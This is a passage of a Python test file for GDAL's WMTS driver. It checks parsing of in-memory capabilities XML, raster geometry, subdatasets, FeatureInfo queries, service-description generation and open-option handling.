    gdal.PopErrorHandler()
    if ds is not None:
        gdaltest.post_reason('fail')
        return 'fail'
    return 'success'
###############################################################################
# Error: Missing ResourceURL
def wmts_12bis():
    """Error: otherwise-complete document whose layer has no ResourceURL."""
    if gdaltest.wmts_drv is None:
        return 'skip'
    gdal.FileFromMemBuffer('/vsimem/wmts_12bis.xml', """<Capabilities>
<Contents>
<Layer>
<Identifier/>
<TileMatrixSetLink>
<TileMatrixSet/>
</TileMatrixSetLink>
<Style>
<Identifier/>
</Style>
</Layer>
<TileMatrixSet>
<Identifier/>
<SupportedCRS>urn:ogc:def:crs:EPSG:6.18:3:3857</SupportedCRS>
<TileMatrix>
<Identifier>0</Identifier>
<ScaleDenominator>559082264.029</ScaleDenominator>
<TopLeftCorner>-20037508.3428 20037508.3428</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
</Contents>
</Capabilities>""")
    # Open must fail; silence the expected error output.
    gdal.PushErrorHandler()
    ds = gdal.Open('WMTS:/vsimem/wmts_12bis.xml')
    gdal.PopErrorHandler()
    if ds is not None:
        gdaltest.post_reason('fail')
        return 'fail'
    return 'success'
###############################################################################
# Minimal
def wmts_13():
    """Nominal: minimal valid capabilities with one 256x256 tile matrix.

    Checks raster size, geotransform, SRS, band layout, open-option
    validation, and that pixel data round-trips once the single tile exists.
    """
    if gdaltest.wmts_drv is None:
        return 'skip'
    gdal.FileFromMemBuffer('/vsimem/minimal.xml', """<Capabilities>
<Contents>
<Layer>
<Identifier/>
<TileMatrixSetLink>
<TileMatrixSet/>
</TileMatrixSetLink>
<Style>
<Identifier/>
</Style>
<ResourceURL format="image/png" template="/vsimem/{TileMatrix}/{TileRow}/{TileCol}.png" resourceType="tile"/>
</Layer>
<TileMatrixSet>
<Identifier/>
<SupportedCRS>urn:ogc:def:crs:EPSG:6.18:3:3857</SupportedCRS>
<TileMatrix>
<Identifier>0</Identifier>
<ScaleDenominator>559082264.029</ScaleDenominator>
<TopLeftCorner>-20037508.3428 20037508.3428</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
</Contents>
</Capabilities>""")
    ds = gdal.Open('WMTS:/vsimem/minimal.xml')
    if ds is None:
        gdaltest.post_reason('fail')
        return 'fail'
    # A single 256x256 tile matrix -> dataset is exactly 256x256.
    if ds.RasterXSize != 256:
        gdaltest.post_reason('fail')
        return 'fail'
    if ds.RasterYSize != 256:
        gdaltest.post_reason('fail')
        return 'fail'
    got_gt = ds.GetGeoTransform()
    expected_gt = (-20037508.342799999, 156543.03392811998, 0.0, 20037508.342799999, 0.0, -156543.03392811998)
    for i in range(6):
        if abs(got_gt[i] - expected_gt[i]) > 1e-8:
            gdaltest.post_reason('fail')
            print(got_gt)
            return 'fail'
    if ds.GetProjectionRef().find('3857') < 0:
        gdaltest.post_reason('fail')
        return 'fail'
    # 4 bands, interpreted as R, G, B, A in order.
    if ds.RasterCount != 4:
        gdaltest.post_reason('fail')
        return 'fail'
    for i in range(4):
        if ds.GetRasterBand(i+1).GetColorInterpretation() != gdal.GCI_RedBand + i:
            gdaltest.post_reason('fail')
            return 'fail'
    # A single zoom level means no overviews.
    if ds.GetRasterBand(1).GetOverviewCount() != 0:
        gdaltest.post_reason('fail')
        return 'fail'
    if ds.GetRasterBand(1).GetOverview(0) is not None:
        gdaltest.post_reason('fail')
        return 'fail'
    # No tile has been created yet, so the band reads as empty (checksum 0).
    gdal.PushErrorHandler()
    cs = ds.GetRasterBand(1).Checksum()
    gdal.PopErrorHandler()
    if cs != 0:
        gdaltest.post_reason('fail')
        return 'fail'
    # With a single layer/style/TMS there is nothing to list as subdatasets.
    if ds.GetSubDatasets() != []:
        gdaltest.post_reason('fail')
        print(ds.GetSubDatasets())
        return 'fail'
    # No FeatureInfo ResourceURL declared -> LocationInfo is unavailable.
    if ds.GetRasterBand(1).GetMetadataItem('Pixel_0_0', 'LocationInfo') is not None:
        gdaltest.post_reason('fail')
        return 'fail'
    if ds.GetRasterBand(1).GetMetadataItem('foo') is not None:
        gdaltest.post_reason('fail')
        return 'fail'
    # Empty open-option values in the connection string must be accepted.
    for connection_str in [ 'WMTS:/vsimem/minimal.xml,layer=',
                            'WMTS:/vsimem/minimal.xml,style=',
                            'WMTS:/vsimem/minimal.xml,tilematrixset=',
                            'WMTS:/vsimem/minimal.xml,tilematrix=',
                            'WMTS:/vsimem/minimal.xml,zoom_level=',
                            'WMTS:/vsimem/minimal.xml,layer=,style=,tilematrixset=' ]:
        ds = gdal.Open(connection_str)
        if ds is None:
            gdaltest.post_reason('fail')
            print(connection_str)
            return 'fail'
        ds = None
    # Non-existing layer/style/tilematrixset/... values must be rejected.
    for connection_str in [ 'WMTS:/vsimem/minimal.xml,layer=foo',
                            'WMTS:/vsimem/minimal.xml,style=bar',
                            'WMTS:/vsimem/minimal.xml,tilematrixset=baz',
                            'WMTS:/vsimem/minimal.xml,tilematrix=baw',
                            'WMTS:/vsimem/minimal.xml,zoom_level=30' ]:
        gdal.PushErrorHandler()
        ds = gdal.Open(connection_str)
        gdal.PopErrorHandler()
        if ds is not None:
            gdaltest.post_reason('fail')
            print(connection_str)
            return 'fail'
        ds = None
    ds = gdal.Open('WMTS:/vsimem/minimal.xml')
    # Create the single PNG tile at the location the ResourceURL template
    # points to, then verify the driver serves exactly those pixels back.
    tmp_ds = gdal.GetDriverByName('MEM').Create('',256,256,4)
    for i in range(4):
        tmp_ds.GetRasterBand(i+1).Fill((i+1)*255/4)
    tmp_ds = gdal.GetDriverByName('PNG').CreateCopy('/vsimem/0/0/0.png', tmp_ds)
    for i in range(4):
        cs = ds.GetRasterBand(i+1).Checksum()
        if cs != tmp_ds.GetRasterBand(i+1).Checksum():
            gdaltest.post_reason('fail')
            return 'fail'
    ref_data = tmp_ds.ReadRaster(0,0,256,256)
    got_data = ds.ReadRaster(0,0,ds.RasterXSize,ds.RasterYSize,256,256)
    if ref_data != got_data:
        gdaltest.post_reason('fail')
        return 'fail'
    ref_data = tmp_ds.GetRasterBand(1).ReadRaster(0,0,256,256)
    got_data = ds.GetRasterBand(1).ReadRaster(0,0,ds.RasterXSize,ds.RasterYSize,256,256)
    if ref_data != got_data:
        gdaltest.post_reason('fail')
        return 'fail'
    ds = None
    # Drop the block cache so later tests start clean.
    wmts_CleanCache()
    return 'success'
###############################################################################
# Nominal RESTful
def wmts_14():
    """Nominal RESTful service: subdatasets, FeatureInfo, CreateCopy round-trip.

    Exercises a multi-layer/style/TMS capabilities document, the generated
    GDAL_WMTS service description (CreateCopy), LocationInfo via the
    FeatureInfo ResourceURL, open options, and tilematrix/zoom_level
    selection both from the connection string and the service description.
    """
    if gdaltest.wmts_drv is None:
        return 'skip'
    gdal.FileFromMemBuffer('/vsimem/nominal.xml', """<Capabilities>
<Contents>
<Layer>
<Identifier>lyr1</Identifier>
<Title>My layer1</Title>
<Abstract>My abstract</Abstract>
<ows:WGS84BoundingBox>
<ows:LowerCorner>-180 -85.0511287798065</ows:LowerCorner>
<ows:UpperCorner>180 85.0511287798065</ows:UpperCorner>
</ows:WGS84BoundingBox>
<Dimension>
<ows:Identifier>time</ows:Identifier>
<UOM>ISO8601</UOM>
<Default>2011-10-04</Default>
<Current>false</Current>
<Value>2002-06-01/2011-10-04/P1D</Value>
</Dimension>
<TileMatrixSetLink>
<TileMatrixSet>tms</TileMatrixSet>
</TileMatrixSetLink>
<TileMatrixSetLink>
<TileMatrixSet>another_tms</TileMatrixSet>
</TileMatrixSetLink>
<Style isDefault="true">
<Identifier>style=auto</Identifier>
<Title>Default style</Title>
</Style>
<Style>
<Identifier>another_style</Identifier>
<Title>Another style</Title>
</Style>
<ResourceURL format="image/png"
template="/vsimem/{time}/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png" resourceType="tile"/>
<ResourceURL format="text/plain"
template="/vsimem/{time}/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}/{J}/{I}.txt" resourceType="FeatureInfo"/>
</Layer>
<TileMatrixSet>
<Identifier>tms</Identifier>
<SupportedCRS>urn:ogc:def:crs:EPSG:6.18:3:3857</SupportedCRS>
<TileMatrix>
<Identifier>tm_0</Identifier>
<ScaleDenominator>559082264.029</ScaleDenominator>
<TopLeftCorner>-20037508.3428 20037508.3428</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>tm_18</ows:Identifier>
<ScaleDenominator>2132.72958385</ScaleDenominator>
<TopLeftCorner>-20037508.3428 20037508.3428</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>262144</MatrixWidth>
<MatrixHeight>262144</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>24</ows:Identifier>
<ScaleDenominator>33.3238997477</ScaleDenominator>
<TopLeftCorner>-20037508.3428 20037508.3428</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>16777216</MatrixWidth>
<MatrixHeight>16777216</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
<TileMatrixSet>
<Identifier>another_tms</Identifier>
<ows:Identifier>GoogleCRS84Quad</ows:Identifier>
<ows:SupportedCRS>urn:ogc:def:crs:EPSG::4326</ows:SupportedCRS>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:0</ows:Identifier>
<ScaleDenominator>5.590822640287178E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
</Contents>
<ServiceMetadataURL xlink:href="/vsimem/nominal.xml"/>
</Capabilities>""")
    ds = gdal.Open('WMTS:/vsimem/nominal.xml')
    if ds is None:
        gdaltest.post_reason('fail')
        return 'fail'
    # 2 tile matrix sets x 2 styles -> 4 subdatasets in declaration order.
    if ds.GetSubDatasets() != [('WMTS:/vsimem/nominal.xml,layer=lyr1,tilematrixset=tms,style="style=auto"',
                                'Layer My layer1, tile matrix set tms, style "Default style"'),
                               ('WMTS:/vsimem/nominal.xml,layer=lyr1,tilematrixset=tms,style=another_style',
                                'Layer My layer1, tile matrix set tms, style "Another style"'),
                               ('WMTS:/vsimem/nominal.xml,layer=lyr1,tilematrixset=another_tms,style="style=auto"',
                                'Layer My layer1, tile matrix set another_tms, style "Default style"'),
                               ('WMTS:/vsimem/nominal.xml,layer=lyr1,tilematrixset=another_tms,style=another_style',
                                'Layer My layer1, tile matrix set another_tms, style "Another style"')]:
        gdaltest.post_reason('fail')
        print(ds.GetSubDatasets())
        return 'fail'
    # Deepest matrix (24) has 16777216 x 256 = wait: size comes from tm 24.
    # NOTE(review): 67108864 px presumably derives from the deepest usable
    # matrix and the bounding box -- confirm against the driver docs.
    if ds.RasterXSize != 67108864:
        gdaltest.post_reason('fail')
        return 'fail'
    # FeatureInfo file not created yet: query yields an empty string.
    gdal.PushErrorHandler()
    res = ds.GetRasterBand(1).GetMetadataItem('Pixel_1_2', 'LocationInfo')
    gdal.PopErrorHandler()
    if res != '':
        gdaltest.post_reason('fail')
        print(res)
        return 'fail'
    if ds.GetMetadata() != {'ABSTRACT': 'My abstract', 'TITLE': 'My layer1'}:
        gdaltest.post_reason('fail')
        print(ds.GetMetadata())
        return 'fail'
    # CreateCopy from a non-WMTS source is expected to fail (errors hidden),
    # then succeed from the WMTS dataset itself.
    gdal.PushErrorHandler()
    gdaltest.wmts_drv.CreateCopy('/vsimem/gdal_nominal.xml', gdal.GetDriverByName('MEM').Create('',1,1))
    gdal.PopErrorHandler()
    gdaltest.wmts_drv.CreateCopy('/vsimem/gdal_nominal.xml', ds)
    ds = None
    # The generated service description must match exactly.
    f = gdal.VSIFOpenL('/vsimem/gdal_nominal.xml', 'rb')
    data = gdal.VSIFReadL(1, 10000, f).decode('ascii')
    gdal.VSIFCloseL(f)
    if data != """<GDAL_WMTS>
<GetCapabilitiesUrl>/vsimem/nominal.xml</GetCapabilitiesUrl>
<Layer>lyr1</Layer>
<Style>style=auto</Style>
<TileMatrixSet>tms</TileMatrixSet>
<DataWindow>
<UpperLeftX>-20037508.3428</UpperLeftX>
<UpperLeftY>20037508.3428</UpperLeftY>
<LowerRightX>20037508.34278254</LowerRightX>
<LowerRightY>-20037508.34278254</LowerRightY>
</DataWindow>
<BandsCount>4</BandsCount>
<Cache />
<UnsafeSSL>true</UnsafeSSL>
<ZeroBlockHttpCodes>204,404</ZeroBlockHttpCodes>
<ZeroBlockOnServerException>true</ZeroBlockOnServerException>
</GDAL_WMTS>
""":
        gdaltest.post_reason('fail')
        print(data)
        return 'fail'
    ds = gdal.Open('/vsimem/gdal_nominal.xml')
    # Provide a FeatureInfo document at the templated path and query it twice
    # (second query exercises the cached answer).
    gdal.FileFromMemBuffer('/vsimem/2011-10-04/style=auto/tms/tm_18/0/0/2/1.txt', 'foo')
    res = ds.GetRasterBand(1).GetMetadataItem('Pixel_1_2', 'LocationInfo')
    if res != '<LocationInfo>foo</LocationInfo>':
        gdaltest.post_reason('fail')
        print(res)
        return 'fail'
    res = ds.GetRasterBand(1).GetMetadataItem('Pixel_1_2', 'LocationInfo')
    if res != '<LocationInfo>foo</LocationInfo>':
        gdaltest.post_reason('fail')
        print(res)
        return 'fail'
    # Opening via an inline GDAL_WMTS document and via WMTS: prefix both work.
    ds = gdal.Open('<GDAL_WMTS><GetCapabilitiesUrl>/vsimem/nominal.xml</GetCapabilitiesUrl></GDAL_WMTS>')
    if ds is None:
        gdaltest.post_reason('fail')
        return 'fail'
    ds = gdal.Open('WMTS:/vsimem/gdal_nominal.xml')
    if ds is None:
        gdaltest.post_reason('fail')
        return 'fail'
    # Valid open-option combinations must succeed.
    for open_options in [ ['URL=/vsimem/nominal.xml'],
                          ['URL=/vsimem/nominal.xml', 'STYLE=style=auto', 'TILEMATRIXSET=tms'] ]:
        ds = gdal.OpenEx('WMTS:', open_options = open_options)
        if ds is None:
            gdaltest.post_reason('fail')
            return 'fail'
    # Invalid style/tilematrix/zoom level selections must fail.
    for open_options in [ ['URL=/vsimem/nominal.xml', 'STYLE=x', 'TILEMATRIXSET=y'],
                          ['URL=/vsimem/nominal.xml', 'STYLE=style=auto', 'TILEMATRIX=30'],
                          ['URL=/vsimem/nominal.xml', 'STYLE=style=auto', 'ZOOM_LEVEL=30'] ]:
        gdal.PushErrorHandler()
        ds = gdal.OpenEx('WMTS:', open_options = open_options)
        gdal.PopErrorHandler()
        if ds is not None:
            gdaltest.post_reason('fail')
            return 'fail'
    ds = gdal.Open('WMTS:/vsimem/nominal.xml')
    # XML FeatureInfo content gets embedded (reserialized) in LocationInfo.
    gdal.FileFromMemBuffer('/vsimem/2011-10-04/style=auto/tms/tm_18/0/0/2/1.txt', '<?xml version="1.0" encoding="UTF-8"?><xml_content/>')
    res = ds.GetRasterBand(1).GetMetadataItem('Pixel_1_2', 'LocationInfo')
    if res != """<LocationInfo><xml_content />
</LocationInfo>""":
        gdaltest.post_reason('fail')
        print(res)
        return 'fail'
    # Selecting the coarsest matrix via the connection string limits the size.
    ds = gdal.Open('WMTS:/vsimem/gdal_nominal.xml,tilematrix=tm_0')
    if ds is None:
        gdaltest.post_reason('fail')
        return 'fail'
    if ds.RasterXSize != 256:
        gdaltest.post_reason('fail')
        print(ds.RasterXSize)
        return 'fail'
    ds = gdal.OpenEx('WMTS:/vsimem/gdal_nominal.xml', open_options = ['tilematrix=tm_0'])
    if ds is None:
        gdaltest.post_reason('fail')
        return 'fail'
    if ds.RasterXSize != 256:
        gdaltest.post_reason('fail')
        print(ds.RasterXSize)
        return 'fail'
    # zoom_level=0 is equivalent to selecting the first tile matrix.
    ds = gdal.Open('WMTS:/vsimem/gdal_nominal.xml,zoom_level=0')
    if ds is None:
        gdaltest.post_reason('fail')
        return 'fail'
    if ds.RasterXSize != 256:
        gdaltest.post_reason('fail')
        print(ds.RasterXSize)
        return 'fail'
    ds = gdal.OpenEx('WMTS:/vsimem/gdal_nominal.xml', open_options = ['zoom_level=0'])
    if ds is None:
        gdaltest.post_reason('fail')
        return 'fail'
    if ds.RasterXSize != 256:
        gdaltest.post_reason('fail')
        print(ds.RasterXSize)
        return 'fail'
    # <TileMatrix> element inside the service description selects tm_0 too.
    gdal.FileFromMemBuffer('/vsimem/gdal_nominal.xml', """<GDAL_WMTS>
<GetCapabilitiesUrl>/vsimem/nominal.xml</GetCapabilitiesUrl>
<Layer>lyr1</Layer>
<Style>style=auto</Style>
<TileMatrixSet>tms</TileMatrixSet>
<TileMatrix>tm_0</TileMatrix>
<DataWindow>
<UpperLeftX>-20037508.3428</UpperLeftX>
<UpperLeftY>20037508.3428</UpperLeftY>
<LowerRightX>20037508.34278254</LowerRightX>
<LowerRightY>-20037508.34278254</LowerRightY>
</DataWindow>
<BandsCount>4</BandsCount>
<Cache />
<UnsafeSSL>true</UnsafeSSL>
<ZeroBlockHttpCodes>204,404</ZeroBlockHttpCodes>
<ZeroBlockOnServerException>true</ZeroBlockOnServerException>
</GDAL_WMTS>""")
    ds = gdal.Open('WMTS:/vsimem/gdal_nominal.xml')
    if ds is None:
        gdaltest.post_reason('fail')
        return 'fail'
    if ds.RasterXSize != 256:
        gdaltest.post_reason('fail')
        print(ds.RasterXSize)
        return 'fail'
    # <ZoomLevel> element in the service description behaves the same way.
    gdal.FileFromMemBuffer('/vsimem/gdal_nominal.xml', """<GDAL_WMTS>
<GetCapabilitiesUrl>/vsimem/nominal.xml</GetCapabilitiesUrl>
<Layer>lyr1</Layer>
<Style>style=auto</Style>
<TileMatrixSet>tms</TileMatrixSet>
<ZoomLevel>0</ZoomLevel>
<DataWindow>
<UpperLeftX>-20037508.3428</UpperLeftX>
<UpperLeftY>20037508.3428</UpperLeftY>
<LowerRightX>20037508.34278254</LowerRightX>
<LowerRightY>-20037508.34278254</LowerRightY>
</DataWindow>
<BandsCount>4</BandsCount>
<Cache />
<UnsafeSSL>true</UnsafeSSL>
<ZeroBlockHttpCodes>204,404</ZeroBlockHttpCodes>
<ZeroBlockOnServerException>true</ZeroBlockOnServerException>
</GDAL_WMTS>""")
    ds = gdal.Open('WMTS:/vsimem/gdal_nominal.xml')
    if ds is None:
        gdaltest.post_reason('fail')
        return 'fail'
    if ds.RasterXSize != 256:
        gdaltest.post_reason('fail')
        print(ds.RasterXSize)
        return 'fail'
    return 'success'
###############################################################################
# Nominal KVP
def wmts_15():
    """Nominal KVP (key-value-pair) service: GetTile/GetFeatureInfo via URLs.

    The capabilities advertise KVP endpoints via OperationsMetadata instead
    of RESTful ResourceURL templates, so the driver must build request URLs
    with query parameters.
    """
    if gdaltest.wmts_drv is None:
        return 'skip'
    gdal.FileFromMemBuffer('/vsimem/nominal_kvp.xml?service=WMTS&request=GetCapabilities', """<Capabilities xmlns="http://www.opengis.net/wmts/1.0">
<ows:OperationsMetadata>
<ows:Operation name="GetCapabilities">
<ows:DCP>
<ows:HTTP>
<ows:Get xlink:href="/vsimem/nominal_kvp.xml?">
<ows:Constraint name="GetEncoding">
<ows:AllowedValues>
<ows:Value>KVP</ows:Value>
</ows:AllowedValues>
</ows:Constraint>
</ows:Get>
</ows:HTTP>
</ows:DCP>
</ows:Operation>
<ows:Operation name="GetTile">
<ows:DCP>
<ows:HTTP>
<ows:Get xlink:href="/vsimem/nominal_kvp.xml?">
</ows:Get>
</ows:HTTP>
</ows:DCP>
</ows:Operation>
<ows:Operation name="GetFeatureInfo">
<ows:DCP>
<ows:HTTP>
<ows:Get xlink:href="/vsimem/nominal_kvp.xml?">
</ows:Get>
</ows:HTTP>
</ows:DCP>
</ows:Operation>
</ows:OperationsMetadata>
<Contents>
<Layer>
<Identifier>lyr1</Identifier>
<Title>My layer1</Title>
<ows:BoundingBox crs="urn:ogc:def:crs:EPSG:6.18:3:3857">
<ows:LowerCorner>-20037508.3428 -20037508.3428</ows:LowerCorner>
<ows:UpperCorner>20037508.3428 20037508.3428</ows:UpperCorner>
</ows:BoundingBox>
<Dimension>
<ows:Identifier>time</ows:Identifier>
<UOM>ISO8601</UOM>
<Default>2011-10-04</Default>
<Current>false</Current>
<Value>2002-06-01/2011-10-04/P1D</Value>
</Dimension>
<TileMatrixSetLink>
<TileMatrixSet>tms</TileMatrixSet>
</TileMatrixSetLink>
<Style isDefault="true">
<Identifier>default_style</Identifier>
<Title>Default style</Title>
</Style>
<Format>image/jpeg</Format>
<Format>image/png</Format>
<InfoFormat>text/plain</InfoFormat>
</Layer>
<TileMatrixSet>
<Identifier>tms</Identifier>
<ows:BoundingBox crs="urn:ogc:def:crs:EPSG:6.18:3:3857">
<ows:LowerCorner>-20037508.3428 -20037508.3428</ows:LowerCorner>
<ows:UpperCorner>20037508.3428 20037508.3428</ows:UpperCorner>
</ows:BoundingBox>
<SupportedCRS>urn:ogc:def:crs:EPSG:6.18:3:3857</SupportedCRS>
<TileMatrix>
<Identifier>0</Identifier>
<ScaleDenominator>559082264.029</ScaleDenominator>
<TopLeftCorner>-20037508.3428 20037508.3428</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>18</ows:Identifier>
<ScaleDenominator>2132.72958385</ScaleDenominator>
<TopLeftCorner>-20037508.3428 20037508.3428</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>262144</MatrixWidth>
<MatrixHeight>262144</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>24</ows:Identifier>
<ScaleDenominator>33.3238997477</ScaleDenominator>
<TopLeftCorner>-20037508.3428 20037508.3428</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>16777216</MatrixWidth>
<MatrixHeight>16777216</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
</Contents>
</Capabilities>""")
    # The KVP GetCapabilities URL itself is openable (no WMTS: prefix needed).
    ds = gdal.Open('/vsimem/nominal_kvp.xml?service=WMTS&request=GetCapabilities')
    if ds is None:
        gdaltest.post_reason('fail')
        return 'fail'
    if ds.RasterXSize != 67108864:
        gdaltest.post_reason('fail')
        return 'fail'
    # No FeatureInfo document exists yet: LocationInfo query returns ''.
    gdal.PushErrorHandler()
    res = ds.GetRasterBand(1).GetMetadataItem('Pixel_1_2', 'LocationInfo')
    gdal.PopErrorHandler()
    if res != '':
        gdaltest.post_reason('fail')
        print(res)
        return 'fail'
    gdaltest.wmts_drv.CreateCopy('/vsimem/gdal_nominal_kvp.xml', ds)
    ds = None
    ds = gdal.Open('/vsimem/gdal_nominal_kvp.xml')
    # Serve a FeatureInfo response at the exact KVP GetFeatureInfo URL the
    # driver is expected to build, then query it.
    gdal.FileFromMemBuffer('/vsimem/nominal_kvp.xml?service=WMTS&request=GetFeatureInfo&version=1.0.0&layer=lyr1&style=default_style&InfoFormat=text/plain&TileMatrixSet=tms&TileMatrix=18&TileRow=0&TileCol=0&J=2&I=1&time=2011-10-04', 'bar')
    res = ds.GetRasterBand(1).GetMetadataItem('Pixel_1_2', 'LocationInfo')
    if res != '<LocationInfo>bar</LocationInfo>':
        gdaltest.post_reason('fail')
        print(res)
        return 'fail'
    ds = gdal.Open('WMTS:/vsimem/gdal_nominal_kvp.xml')
    if ds is None:
        gdaltest.post_reason('fail')
        return 'fail'
    # Serve the tile at the KVP GetTile URL and compare pixel data.
    tmp_ds = gdal.GetDriverByName('MEM').Create('',256,256,4)
    for i in range(4):
        tmp_ds.GetRasterBand(i+1).Fill((i+1)*255/4)
    tmp_ds = gdal.GetDriverByName('PNG').CreateCopy('/vsimem/nominal_kvp.xml?service=WMTS&request=GetTile&version=1.0.0&layer=lyr1&style=default_style&format=image/png&TileMatrixSet=tms&TileMatrix=0&TileRow=0&TileCol=0&time=2011-10-04', tmp_ds)
    for i in range(4):
        cs = ds.GetRasterBand(i+1).GetOverview(0).Checksum()
        if cs != tmp_ds.GetRasterBand(i+1).Checksum():
            gdaltest.post_reason('fail')
            return 'fail'
    ref_data = tmp_ds.ReadRaster(0,0,256,256)
    got_data = ds.ReadRaster(0,0,ds.RasterXSize,ds.RasterYSize,256,256)
    if ref_data != got_data:
        gdaltest.post_reason('fail')
        return 'fail'
    ref_data = tmp_ds.GetRasterBand(1).ReadRaster(0,0,256,256)
    got_data = ds.GetRasterBand(1).ReadRaster(0,0,ds.RasterXSize,ds.RasterYSize,256,256)
    if ref_data != got_data:
        gdaltest.post_reason('fail')
        return 'fail'
    ds = None
    # Drop the block cache so later tests start clean.
    wmts_CleanCache()
    return 'success'
###############################################################################
# AOI from layer WGS84BoundingBox
def wmts_16():
    """Area of interest derived from the layer's WGS84BoundingBox.

    The layer covers lon [-90, 90], lat [0, 90]; with GoogleCRS84Quad level 2
    (4x2 tiles of 256px) the clipped dataset must be 512x256 with a matching
    geotransform in EPSG:4326.
    """
    if gdaltest.wmts_drv is None:
        return 'skip'
    gdal.FileFromMemBuffer('/vsimem/wmts_16.xml', """<Capabilities>
<Contents>
<Layer>
<Identifier>lyr1</Identifier>
<Title>My layer1</Title>
<ows:WGS84BoundingBox>
<ows:LowerCorner>-90 0</ows:LowerCorner>
<ows:UpperCorner>90 90</ows:UpperCorner>
</ows:WGS84BoundingBox>
<TileMatrixSetLink>
<TileMatrixSet>tms</TileMatrixSet>
</TileMatrixSetLink>
<Style isDefault="true">
<Identifier>default_style</Identifier>
<Title>Default style</Title>
</Style>
<ResourceURL format="image/png"
template="/vsimem/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png" resourceType="tile"/>
</Layer>
<TileMatrixSet>
<Identifier>tms</Identifier>
<ows:Identifier>GoogleCRS84Quad</ows:Identifier>
<ows:SupportedCRS>urn:ogc:def:crs:EPSG::4326</ows:SupportedCRS>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:0</ows:Identifier>
<ScaleDenominator>5.590822640287178E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:1</ows:Identifier>
<ScaleDenominator>2.795411320143589E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>2</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:2</ows:Identifier>
<ScaleDenominator>1.397705660071794E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>4</MatrixWidth>
<MatrixHeight>2</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
</Contents>
<ServiceMetadataURL xlink:href="/vsimem/wmts_16.xml"/>
</Capabilities>""")
    ds = gdal.Open('WMTS:/vsimem/wmts_16.xml')
    if ds is None:
        gdaltest.post_reason('fail')
        return 'fail'
    if ds.RasterXSize != 512:
        gdaltest.post_reason('fail')
        print(ds.RasterXSize)
        return 'fail'
    if ds.RasterYSize != 256:
        gdaltest.post_reason('fail')
        print(ds.RasterYSize)
        return 'fail'
    got_gt = ds.GetGeoTransform()
    # 180 deg / 512 px = 0.3515625 deg/px, anchored at (-90, 90).
    expected_gt = (-90, 0.3515625, 0.0, 90.0, 0.0, -0.3515625)
    for i in range(6):
        if abs(got_gt[i] - expected_gt[i]) > 1e-8:
            gdaltest.post_reason('fail')
            print(got_gt)
            return 'fail'
    # SRS must be EPSG:4326 with no AXIS swap definition in the WKT.
    if ds.GetProjectionRef().find('4326') < 0 or ds.GetProjectionRef().find('AXIS') >= 0:
        gdaltest.post_reason('fail')
        print(ds.GetProjectionRef())
        return 'fail'
    return 'success'
###############################################################################
# AOI from layer BoundingBox
def wmts_17():
    """Test that the dataset's area of interest is taken from the layer's
    ows:BoundingBox element (CRS-specific bbox, axis order lat/long)."""
    if gdaltest.wmts_drv is None:
        return 'skip'
    gdal.FileFromMemBuffer('/vsimem/wmts_17.xml', """<Capabilities>
<Contents>
<Layer>
<Identifier>lyr1</Identifier>
<Title>My layer1</Title>
<ows:BoundingBox crs="urn:ogc:def:crs:EPSG::4326">
<ows:LowerCorner>0 -90</ows:LowerCorner>
<ows:UpperCorner>90 90</ows:UpperCorner>
</ows:BoundingBox>
<TileMatrixSetLink>
<TileMatrixSet>tms</TileMatrixSet>
</TileMatrixSetLink>
<Style isDefault="true">
<Identifier>default_style</Identifier>
<Title>Default style</Title>
</Style>
<ResourceURL format="image/png"
template="/vsimem/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png" resourceType="tile"/>
</Layer>
<TileMatrixSet>
<Identifier>tms</Identifier>
<ows:Identifier>GoogleCRS84Quad</ows:Identifier>
<ows:SupportedCRS>urn:ogc:def:crs:EPSG::4326</ows:SupportedCRS>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:0</ows:Identifier>
<ScaleDenominator>5.590822640287178E8</ScaleDenominator>
